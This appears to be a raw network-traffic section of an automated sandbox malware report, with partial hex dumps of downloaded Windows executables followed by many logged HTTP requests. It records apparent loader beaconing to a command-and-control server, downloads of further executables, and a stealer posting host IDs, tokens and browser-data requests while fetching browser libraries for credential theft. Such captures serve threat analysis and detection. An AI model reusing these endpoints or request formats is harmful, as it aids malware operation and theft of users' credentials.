00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 01 Sep 2024 03:09:26 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 
00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 01 Sep 2024 03:09:26 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 
72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 01 Sep 2024 03:09:28 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 
65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 01 Sep 2024 03:09:28 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 
00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1 Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 31 Cache-Control: no-cache Data Ascii: d1=1000051000&unit=246122658369
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1 Host: 185.215.113.16 If-Modified-Since: Sun, 01 Sep 2024 01:45:41 GMT If-None-Match: "66d3c745-1b0600"
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 31 Cache-Control: no-cache Data Ascii: d1=1000052000&unit=246122658369
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 Host: 185.215.113.100 Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1 Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFBAKKJDBKJJJKFHDAEB Host: 185.215.113.100 Content-Length: 210 Connection: Keep-Alive Cache-Control: no-cache Data Ascii: ------CFBAKKJDBKJJJKFHDAEBContent-Disposition: form-data; name="hwid"BCAA2B25F446368224558------CFBAKKJDBKJJJKFHDAEBContent-Disposition: form-data; name="build"leva------CFBAKKJDBKJJJKFHDAEB--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FBFCFIEBKEGHIDGCAFBF Host: 185.215.113.100 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Ascii: ------FBFCFIEBKEGHIDGCAFBFContent-Disposition: form-data; name="token"d2d56e80483bfec03421a7b147753a374eef4e127846529722107639eb13a5faccb6b7bb------FBFCFIEBKEGHIDGCAFBFContent-Disposition: form-data; name="message"browsers------FBFCFIEBKEGHIDGCAFBF--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGIJDAFCFHIEHJJKEHJK Host: 185.215.113.100 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Ascii: ------DGIJDAFCFHIEHJJKEHJKContent-Disposition: form-data; name="token"d2d56e80483bfec03421a7b147753a374eef4e127846529722107639eb13a5faccb6b7bb------DGIJDAFCFHIEHJJKEHJKContent-Disposition: form-data; name="message"plugins------DGIJDAFCFHIEHJJKEHJK--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JDBGHIIDAECBFIDHIIDG Host: 185.215.113.100 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Ascii: ------JDBGHIIDAECBFIDHIIDGContent-Disposition: form-data; name="token"d2d56e80483bfec03421a7b147753a374eef4e127846529722107639eb13a5faccb6b7bb------JDBGHIIDAECBFIDHIIDGContent-Disposition: form-data; name="message"fplugins------JDBGHIIDAECBFIDHIIDG--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGCFHIDAKECFHIEBFCGI Host: 185.215.113.100 Content-Length: 5195 Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/sqlite3.dll HTTP/1.1 Host: 185.215.113.100 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 31 Cache-Control: no-cache Data Ascii: d1=1000053001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DAECGCGHCGHCAKECBKJK Host: 185.215.113.100 Content-Length: 4599 Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BAFCFHDHIIIECBGCAKFI Host: 185.215.113.100 Content-Length: 1451 Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JKJEHJKJEBGHJJKEBGIE Host: 185.215.113.100 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Ascii: ------JKJEHJKJEBGHJJKEBGIEContent-Disposition: form-data; name="token"d2d56e80483bfec03421a7b147753a374eef4e127846529722107639eb13a5faccb6b7bb------JKJEHJKJEBGHJJKEBGIEContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------JKJEHJKJEBGHJJKEBGIEContent-Disposition: form-data; name="file"------JKJEHJKJEBGHJJKEBGIE--
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HJKKFIJKFCAKJJJKJKFI Host: 185.215.113.100 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Ascii: ------HJKKFIJKFCAKJJJKJKFIContent-Disposition: form-data; name="token"d2d56e80483bfec03421a7b147753a374eef4e127846529722107639eb13a5faccb6b7bb------HJKKFIJKFCAKJJJKJKFIContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------HJKKFIJKFCAKJJJKJKFIContent-Disposition: form-data; name="file"------HJKKFIJKFCAKJJJKJKFI--
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/freebl3.dll HTTP/1.1 Host: 185.215.113.100 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/mozglue.dll HTTP/1.1Host: 185.215.113.100Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/msvcp140.dll HTTP/1.1Host: 185.215.113.100Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/nss3.dll HTTP/1.1Host: 185.215.113.100Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
